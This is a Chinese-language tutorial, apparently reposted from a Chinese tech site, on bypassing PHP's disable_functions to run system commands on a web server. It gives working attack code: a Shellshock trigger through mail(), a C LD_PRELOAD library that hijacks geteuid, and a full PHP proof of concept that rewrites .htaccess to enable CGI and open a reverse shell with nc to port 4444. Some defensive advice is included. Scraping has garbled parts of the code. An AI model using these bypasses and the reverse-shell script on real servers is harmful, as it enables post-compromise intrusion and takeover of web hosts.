一、為什么要bypass disable functions
為了安全起見,很多運維人員會禁用PHP的一些“危險”函數(shù),例如eval、exec、system等,將其寫在php.ini配置文件中,就是我們所說的disable functions了,特別是虛擬主機運營商,為了徹底隔離同服務(wù)器的客戶,以及避免出現(xiàn)大面積的安全問題,在disable functions的設(shè)置中也通常較為嚴(yán)格。
攻與防是對立的,也是互相補充的,既然有對函數(shù)的禁用措施,就會有人想方設(shè)法的去突破這層限制,我們只有在掌握突破方式以及原理的基礎(chǔ)之上,才能更好的去防范這類攻擊。
執(zhí)行系統(tǒng)命令通常是攻擊者拿到網(wǎng)站webshell之后想要進一步動作的必然操作,如若不能執(zhí)行系統(tǒng)命令,接下來的更深入的攻擊將很難繼續(xù),所以就有了網(wǎng)站管理者禁用類似exec、system之類函數(shù)的現(xiàn)象。然而隨著技術(shù)的不斷進步,不斷有新的思路出現(xiàn),單純的禁用這些函數(shù),某些情況下已經(jīng)不能阻止攻擊者達(dá)到執(zhí)行系統(tǒng)命令的目的了,那么攻擊者用什么樣的方式突破了disable functions呢?我們又怎樣防范這樣的攻擊呢?
二、 Bash漏洞導(dǎo)致的任意命令執(zhí)行
GNU Bash 環(huán)境變量遠(yuǎn)程命令執(zhí)行漏洞(CVE-2014-6271)是GNU Bash 的一個遠(yuǎn)程代碼執(zhí)行漏洞,在這個CVE的介紹中,可以看到這樣的描述:“GNU Bash 4.3及之前版本中存在安全漏洞,該漏洞源于程序沒有正確處理環(huán)境變量值內(nèi)的函數(shù)定義。遠(yuǎn)程攻擊者可借助特制的環(huán)境變量利用該漏洞執(zhí)行任意代碼。以下產(chǎn)品和模塊可能會被利用:OpenSSH sshd中的ForceCommand功能,Apache HTTP Server中的mod_cgi和mod_cgid模塊,DHCP客戶端等”。實際上,PHP也可以利用這個漏洞做很多事情,甚至有可能直接在80導(dǎo)致遠(yuǎn)程命令執(zhí)行。關(guān)于這個漏洞的詳細(xì)情況可以查閱CVE-2014-6271的相關(guān)資料,此處不再贅述。
下面我們來看一下PHP到底什么地方能用到bash的這個漏洞呢?其實可以用的地方不止一處,這里我們以mail函數(shù)作為例子,其他地方同理,可以自行分析。
PHP的mail函數(shù)提供了3個必選參數(shù)和2個可選參數(shù),這里我們主要看最后一個參數(shù),PHP官方手冊上對最后一個參數(shù)的說明:
“Theadditional_parameters parameter can be used to pass an additional parameter tothe program configured to use when sending mail using the sendmail_pathconfiguration setting. For example, this can be used to set the envelope senderaddress when using sendmail with the -f sendmail option.
Theuser that the webserver runs as should be added as a trusted user to thesendmail configuration to prevent a ‘X-Warning' header from being added to themessage when the envelope sender (-f) is set using this method. For sendmailusers, this file is /etc/mail/trusted-users. “
簡單的說就是這個參數(shù)可以通過添加附加的命令作為發(fā)送郵件時候的配置,比如使用-f參數(shù)可以設(shè)置郵件發(fā)件人等,官方文檔在范例Example #3也有所演示,具體可以參考官方文檔: http://php.net/manual/zh/function.mail.php 。
在mail函數(shù)的源代碼mail.c中,我們可以找到如下代碼片段:
if (extra_cmd != NULL) {
spprintf(sendmail_cmd, 0,"%s %s", sendmail_path, extra_cmd);
} else {
sendmail_cmd = sendmail_path;
}
如果傳遞了第五個參數(shù)(extra_cmd),則用spprintf將sendmail_path和extra_cmd拼接到sendmail_cmd中(其中sendmail_path就是php.ini中的sendmail_path配置項),隨后將sendmail_cmd丟給popen執(zhí)行:
#ifdef PHP_WIN32
sendmail = popen_ex(sendmail_cmd,"wb", NULL, NULL TSRMLS_CC);
#else
/* Since popen() doesn't indicate if theinternal fork() doesn't work
*(e.g. the shell can't be executed) we explicitly set it to 0 to be
*sure we don't catch any older errno value. */
errno = 0;
sendmail = popen(sendmail_cmd,"w");
#endif
如果系統(tǒng)默認(rèn)sh是bash,popen會派生bash進程,而我們剛才提到的CVE-2014-6271漏洞,直接就導(dǎo)致我們可以利用mail()函數(shù)執(zhí)行任意命令,繞過disable_functions的限制。但是這里其實有一個問題,就是extra_cmd在spprintf之前做了安全檢查,我當(dāng)前的PHP版本是最新的7.2.4,代碼位置在mail.c的第371-375行:
if (force_extra_parameters) {
extra_cmd =php_escape_shell_cmd(force_extra_parameters);
} else if (extra_cmd) {
extra_cmd =php_escape_shell_cmd(ZSTR_VAL(extra_cmd));
}
php_escape_shell_cmd函數(shù)會對特殊字符(包括#;`|*?~>^()[]{}$\, \x0A and \xFF. ‘ 等)進行轉(zhuǎn)義,那這樣是不是就沒辦法了呢?不是的,我們可以通過putenv函數(shù)來設(shè)置一個包含自定義函數(shù)的環(huán)境變量,然后通過mail函數(shù)來觸發(fā),網(wǎng)上早已有POC。
同樣調(diào)用popen派生進程的php函數(shù)還有imap_mail,或者還可能有其他的我們沒有發(fā)現(xiàn)的函數(shù),所以如果要防范這類攻擊,最好的辦法就是從根源上入手,修復(fù)CVE-2014-6271這個bash漏洞。
三、LD_PRELOAD:無需bash漏洞
上文說到mail函數(shù)利用bash破殼漏洞可以實現(xiàn)突破disable functions的限制執(zhí)行系統(tǒng)命令,但是像這樣的漏洞,一般安全意識稍好一點的運維人員,都會打上補丁了,那么是不是打上補丁之后就一定安全了呢?顯然答案是否定的,LD_PRELOAD是Linux系統(tǒng)的下一個有趣的環(huán)境變量:
“ 它允許你定義在程序運行前優(yōu)先加載的動態(tài)鏈接庫。這個功能主要就是用來有選擇性的載入不同動態(tài)鏈接庫中的相同函數(shù)。通過這個環(huán)境變量,我們可以在主程序和其動態(tài)鏈接庫的中間加載別的動態(tài)鏈接庫,甚至覆蓋正常的函數(shù)庫。一方面,我們可以以此功能來使用自己的或是更好的函數(shù)(無需別人的源碼),而另一方面,我們也可以以向別人的程序注入程序,從而達(dá)到特定的目的。 ”
它允許你定義在程序運行前優(yōu)先加載的動態(tài)鏈接庫,我們只要知道這一件事就足夠了,這說明什么?這說明我們幾乎可以劫持PHP的大部分函數(shù),還拿上文的mail函數(shù)作為例子,上文說過,php的mail函數(shù)實際上是調(diào)用了系統(tǒng)的sendmail命令,那么我們來看一下sendmail都調(diào)用了哪些庫函數(shù):
使用readelf -Ws /usr/sbin/sendmail命令來查看,我們發(fā)現(xiàn)sendmail函數(shù)在運行過程動態(tài)調(diào)用了很多標(biāo)準(zhǔn)庫函數(shù),我們從中隨便選取一個庫函數(shù)geteuid進行測試。
首先我們編寫一個自己的動態(tài)鏈接程序,hack.c:
#includestdlib.h>
#include stdio.h>
#includestring.h>
void payload() {
system("touch/var/www/html/test");
}
int geteuid() {
if(getenv("LD_PRELOAD") == NULL) { return 0; }
unsetenv("LD_PRELOAD");
payload();
}
當(dāng)這個共享庫中的geteuid被調(diào)用時,嘗試加載payload()函數(shù),執(zhí)行命令,在/var/www/html目錄下創(chuàng)建一個名字為test的文件。這里實際應(yīng)用時應(yīng)該注意編譯平臺和目標(biāo)盡量相近,以及注意路徑問題,避免不必要的麻煩,這里我們僅僅作為測試,不考慮這些問題。
[[email protected]]# gcc -c -fPIC hack.c -o hack
[[email protected]]# gcc -shared hack -o hack.so
我們把hack.so放到WEB目錄,然后編寫一個PHP文件進行測試:
?php
putenv("LD_PRELOAD=/var/www/html/hack.so");
mail("[email protected]","","","","");
?>
我們的/var/www/html/目錄下本來只有hack.so和index.php這兩個文件,當(dāng)我們在瀏覽器中訪問index.php頁面之后,可以看到目錄下又多出了一個test文件,說明我們的系統(tǒng)命令執(zhí)行成功。
(PS:筆者實際測試時的環(huán)境是VMPlayer7+CentOS7+Apache2.4+PHP7.2.4的環(huán)境,測試時遇到一個問題,就是每次刷新訪問index.php時,虛擬機的VM進程會瘋狂的讀寫硬盤,幾乎獨占磁盤的所有活動時間(機械硬盤),導(dǎo)致虛擬機卡頓到連鼠標(biāo)都無法移動,物理機也因此受到影響明顯卡頓,約半小時左右這種情況會突然消失,最終測試結(jié)果成功。不知道是什么原因引起這種現(xiàn)象,需要進一步研究,但不在本文討論范圍之內(nèi)。)
這種繞過行為實施起來很簡單,并且目前為止還不受PHP與Linux版本的限制,但是也很容易防御,只要禁用相關(guān)的函數(shù)(putenv)或者限制對環(huán)境變量的傳遞就可以了,但是要注意對現(xiàn)有業(yè)務(wù)是否造成影響。
其實對于這個問題,早在2008年就有人向PHP官方反饋過,只不過PHP給出的回復(fù)是你最好禁用putenv函數(shù): https://bugs.php.net/bug.php?id=46741 ,所以我們有理由相信在后續(xù)的PHP版本中也不會對這個問題有什么針對性的解決方案。
四、.htaccess:不止重定向
大家對.htaccess文件一定不陌生,沒錯,在apache的WEB環(huán)境中,我們經(jīng)常會使用.htaccess這個文件來確定某個目錄下的URL重寫規(guī)則,特別是一些開源的CMS或者框架當(dāng)中經(jīng)常會用到,比如著名的開源論壇discuz!,就可以通過.htaccess文件實現(xiàn)URL的靜態(tài)化,大部分PHP框架,例如ThinkPHP和Laravel,在apache環(huán)境下會用.htaccess文件實現(xiàn)路由規(guī)則。但是如果.htaccess文件被攻擊者修改的話,攻擊者就可以利用apache的mod_cgi模塊,直接繞過PHP的任何限制,來執(zhí)行系統(tǒng)命令。
關(guān)于mode_cgi,可以參考apache的官方說明: http://man.chinaunix.net/newsoft/ApacheManual/mod/mod_cgi.html 。
“任何具有mime類型application/x-httpd-cgi或者被 cgi-script處理器(Apache 1.1或以后版本)處理的文件將被作為CGI腳本對待并由服務(wù)器運行, 它的輸出將被返回給客戶端。通過兩種途徑使文件成為CGI腳本,或者文件具有已由 AddType指令定義的擴展名,或者文件位于 ScriptAlias目錄中?!保@就表示,apache允許WEB服務(wù)器與可執(zhí)行文件進行交互,這就意味著,你可以用C或者python編寫WEB應(yīng)用,聽起來我們好像可以做任何apache權(quán)限用戶能做的事情了,那么到底如何實現(xiàn)呢?
首先需要滿足幾個條件,第一,必須是apache環(huán)境,第二,mod_cgi已經(jīng)啟用(在我的環(huán)境下是默認(rèn)啟用的),第三,必須允許.htaccess文件,也就是說在httpd.conf中,要注意AllowOverride選項為All,而不是none,第四,必須有權(quán)限寫.htaccess文件。其實這幾個條件還是比較容易滿足的,滿足了以上的條件,就可以“搞事情”了。
在apache的配置中,有一個非常重要的指令,Options,Options指令是Apache配置文件中一個比較常見也比較重要的指令,Options指令可以在Apache服務(wù)器核心配置(server config)、虛擬主機配置(virtual host)、特定目錄配置(directory)以及.htaccess文件中使用。Options指令的主要作用是控制特定目錄將啟用哪些服務(wù)器特性。關(guān)于Options指令后可以附加的特性選項的具體作用及含義,可以參考這篇文章: http://www.365mini.com/page/apache-options-directive.htm ,當(dāng)然我們用到的就是ExecCGI選項,表示允許使用mod_cgi模塊執(zhí)行CGI腳本。除了Options,我們還要配合另外一個AddHandler指令來使用,如果你對AddHandler不太熟悉沒關(guān)系,這么解釋一下就容易理解多了:AddType我們肯定很熟悉,比如配置apache對PHP的支持的時候,經(jīng)常會添加一行類似AddTypeapplication/x-httpd-php .php這樣的配置,這其實是指定了文件擴展名和內(nèi)容類型之間的映射關(guān)系,而AddHandler則是指定擴展名和處理程序之間的關(guān)系,也就是說,可以指定某個特定的擴展名的文件,如何來進行處理。
有了Options和AddHandler,我們就可以隨便指定一個特定的文件擴展名以特定的程序來處理,這樣思路就很清晰了:先把要執(zhí)行的程序?qū)懭胍粋€特定擴展名的文件里,然后修改.htaccess文件,通過Options指令允許使用mod_cgi模塊執(zhí)行CGI腳本,然后再讓我們特定的擴展名以cgi-script進行處理,這樣我們甚至可以反彈一個shell出來。
POC如下,附注釋:
?php
$cmd = "nc -c'/bin/bash' 127.0.0.1 4444"; //反彈一個shell出來,這里用本地的4444端口
$shellfile ="#!/bin/bash\n"; //指定shell
$shellfile .="echo -ne \"Content-Type: text/html\\n\\n\"\n"; //需要指定這個header,否則會返回500
$shellfile .="$cmd";
functioncheckEnabled($text,$condition,$yes,$no) //this surely can be shorter
{
echo "$text: " . ($condition ?$yes : $no) . "br>\n";
}
if(!isset($_GET['checked']))
{
@file_put_contents('.htaccess',"\nSetEnv HTACCESS on", FILE_APPEND);
header('Location: ' . $_SERVER['PHP_SELF']. '?checked=true'); //執(zhí)行環(huán)境的檢查
}
else
{
$modcgi = in_array('mod_cgi',apache_get_modules()); // 檢測mod_cgi是否開啟
$writable = is_writable('.'); //檢測當(dāng)前目錄是否可寫
$htaccess = !empty($_SERVER['HTACCESS']);//檢測是否啟用了.htaccess
checkEnabled("Mod-Cgienabled",$modcgi,"Yes","No");
checkEnabled("Iswritable",$writable,"Yes","No");
checkEnabled("htaccessworking",$htaccess,"Yes","No");
if(!($modcgi $writable $htaccess))
{
echo "Error. All of the above mustbe true for the script to work!"; //必須滿足所有條件
}
else
{
checkEnabled("Backing
up.htaccess",copy(".htaccess",".htaccess.bak"),"Suceeded!Saved in
.htaccess.bak","Failed!"); //備份一下原有.htaccess
checkEnabled("Write
.htaccessfile",file_put_contents('.htaccess',"Options
+ExecCGI\nAddHandlercgi-script
.dizzle"),"Succeeded!","Failed!");//.dizzle,我們的特定擴展名
checkEnabled("Write shellfile",file_put_contents('shell.dizzle',$shellfile),"Succeeded!","Failed!");//寫入文件
checkEnabled("Chmod777",chmod("shell.dizzle",0777),"Succeeded!","Failed!");//給權(quán)限
echo "Executing the script now.Check your listener img src = 'shell.dizzle' style ='display:none;'>"; //調(diào)用
}
}
?>
我們在本地開nc監(jiān)聽4444端口,然后在瀏覽器中打開這個頁面,如果執(zhí)行成功,將會反彈一個shell到4444端口:
當(dāng)訪問POC的時候,成功反彈了一個shell到本地的4444端口,可以看到執(zhí)行id命令后的回顯。
五、其他方式
除上述方式外,在某些特定情況下,還有很多能夠繞過php.ini的禁用函數(shù)達(dá)到執(zhí)行系統(tǒng)命令目的的方法,但是由于這些方法受到的限制頗多,很少有滿足條件的真實環(huán)境,所以鑒于篇幅原因,以下只粗略介紹幾個其他繞過方式,并提供相關(guān)的詳細(xì)介紹的文章鏈接,如果有興趣詳細(xì)了解,可以參考互聯(lián)網(wǎng)上的相關(guān)資料。
ImageMagick
ImageMagick是一款使用量很廣的圖片處理程序,很多廠商包括Discuz、Drupal、Wordpress等常用CMS中也調(diào)用了ImageMagick擴展或ImageMagick庫進行圖片處理,包括圖片的伸縮、切割、水印、格式轉(zhuǎn)換等等。在ImageMagick6.9.3-9以前的所有版本中都存在一個漏洞,當(dāng)用戶傳入一個包含『畸形內(nèi)容』的圖片的時候,就有可能觸發(fā)命令注入,官方在6.9.3-9版本中對漏洞進行了不完全的修復(fù)。關(guān)于這個漏洞的具體利用和防御方式可以參考:
http://wooyun.jozxing.cc/static/drops/papers-15589.html 。
pcntl_exec
pcntl是linux下的一個擴展,可以支持php的多線程操作。很多時候會碰到禁用exec函數(shù)的情況,但如果運維人員安全意識不強或?qū)HP不甚了解,則很有可能忽略pcntl擴展的相關(guān)函數(shù)。
COM 組件
Windows環(huán)境下,當(dāng)php.ini的設(shè)置項com.allow_dcom =true時,可以通過COM組件執(zhí)行系統(tǒng)命令,甚至開啟安全模式也可以,相關(guān)資料參考: https://www.exploit-db.com/exploits/4553/ 。
win32std
win32std是一個很老的PHP擴展,其中的win_shell_execute函數(shù)可以用來執(zhí)行Windows系統(tǒng)命令: https://www.exploit-db.com/exploits/4218/ 。
六、總結(jié)
對于入侵者來說,拿到一個webshell之后,如果想要進一步獲取更高的權(quán)限或更多的數(shù)據(jù)和信息,執(zhí)行系統(tǒng)命令幾乎是必須的。當(dāng)我們在PHP應(yīng)用中出現(xiàn)了某些紕漏導(dǎo)致遭到入侵時,如何讓損失降到最低就成了首要的問題。從本文已經(jīng)列舉的方法中不難看出只要掌握了這些原理,防范工作是非常簡單有效的,只要經(jīng)常關(guān)注安全動態(tài),是完全可以做到對以上繞過措施進行防御的。
以上所述是小編給大家介紹的PHP通過bypass disable functions執(zhí)行系統(tǒng)命令的方法匯總,希望對大家有所幫助,如果大家有任何疑問請給我留言,小編會及時回復(fù)大家的。在此也非常感謝大家對腳本之家網(wǎng)站的支持!
您可能感興趣的文章:- 一些需要禁用的PHP危險函數(shù)(disable_functions)
- php.ini 啟用disable_functions提高安全